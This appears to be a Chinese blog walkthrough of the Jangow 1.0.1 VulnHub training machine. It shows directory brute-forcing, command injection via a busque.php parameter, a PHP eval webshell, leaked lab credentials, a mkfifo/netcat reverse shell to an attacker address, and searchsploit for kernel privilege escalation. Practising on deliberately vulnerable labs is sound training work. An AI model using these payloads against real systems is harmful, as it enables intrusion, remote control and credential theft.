大余每日一攻防JANGOW-1.0.1(三)

admin 2023年12月4日02:51:41评论15 views字数 1550阅读5分10秒阅读模式

简介

每日一攻防是由全球安全研究员 VulnHub 提供的日常实战综合环境。大余安全将按照顺序选择 VulnHub 提供的渗透测试靶场,为网络安全爱好者、渗透测试从业者和安全研究员提供每日综合性的攻击和防御挑战。该项目的目标是促进参与者的技能提升,使他们更好地理解实际攻击和防御场景。

每日一攻防特色:环境攻破:以简单直白的方式攻破每日选择的渗透测试环境。代码审计:进行攻防分析,结合代码审计,深入挖掘漏洞和强化防御。

作者:大余

一首歌送给你们,一首歌一攻防一项目!十年送给大家!


一、网络枚举

大余每日一攻防JANGOW-1.0.1(三)
1701421676_6569a26c09b7d5852d983.png!small?1701421676378

大余每日一攻防JANGOW-1.0.1(三)发现IP地址为:192.168.3.186,开启21和80端口。

二、web信息探测+命令执行

feroxbuster 是一种用于目录和子域名爆破的工具。它设计用于在Web应用程序渗透测试中,通过对目标进行逐一遍历,发现隐藏的目录或文件,以及可能的子域名,配合配合/usr/share/seclists字典很高效率。

https://www.ddosi.org/feroxbuster/https://github.com/epi052/feroxbuster
大余每日一攻防JANGOW-1.0.1(三)
1701421686_6569a276b1d1aa4382d4b.png!small?1701421688900

大余每日一攻防JANGOW-1.0.1(三)发现存在:http://192.168.3.185/site/busque.php

通过site接口源代码发现:大余每日一攻防JANGOW-1.0.1(三)

http://192.168.3.185/site/busque.php?buscar=id

大余每日一攻防JANGOW-1.0.1(三)测试存在命令执行!!

curl http://192.168.3.185/site/busque.php?buscar=cat+busque.php

大余每日一攻防JANGOW-1.0.1(三)查看源代码发现是作者留下的一句话,主要考察发现点而已。

三、反弹shell技巧

直接一句话上传,用蚁剑连接:

http://192.168.3.185/site/busque.php?buscar=echo '<?php @eval($_POST['shell']);?>' > dayu.php

大余每日一攻防JANGOW-1.0.1(三)大余每日一攻防JANGOW-1.0.1(三)

发现了wordpress的账号密码:大余每日一攻防JANGOW-1.0.1(三)

发现.backup 文件中的jangow01/abygurl69:大余每日一攻防JANGOW-1.0.1(三)ftp可以登录没什么信息!

反弹shell:

<?php system("mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.56 443 >/tmp/f");?>

大余每日一攻防JANGOW-1.0.1(三)通过蚁剑写入代码执行成功反弹shell回来。

四、提权

先查看下系统版本:uname -a大余每日一攻防JANGOW-1.0.1(三)乌班图版本:4.4.0

searchsploit ubuntu 4.4.0-31
大余每日一攻防JANGOW-1.0.1(三)
1701421746_6569a2b28817a8f67d57d.png!small?1701421747699
大余每日一攻防JANGOW-1.0.1(三)
1701421750_6569a2b6badf68b32630e.png!small?1701421751880
大余每日一攻防JANGOW-1.0.1(三)
1701421756_6569a2bccacd716e03455.png!small?1701421759113

四、源代码

查看源代码基本没有什么审计分析的:大余每日一攻防JANGOW-1.0.1(三)大余每日一攻防JANGOW-1.0.1(三)两个源代码,一个是木马、一个是泄露ftp账号密码。

通过每日一攻防,我致力于共同深探网络安全的奥秘,助力每位参与者成为网络安全领域的技术高手。立即加入大余安全,共同迎接每日新的挑战!


欢迎大家进入大余安全回忆录帮会,每周二&五定期更新《安全开发》、《渗透测试》系列文章,帮助大家从0基础到入门。

大余每日一攻防JANGOW-1.0.1(三)
1701237386_6566d28ad323e31f56884.png!small?1701237387378


原文始发于微信公众号(大余安全):大余每日一攻防JANGOW-1.0.1(三)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月4日02:51:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大余每日一攻防JANGOW-1.0.1(三)https://cn-sec.com/archives/2263114.html

发表评论

匿名网友 填写信息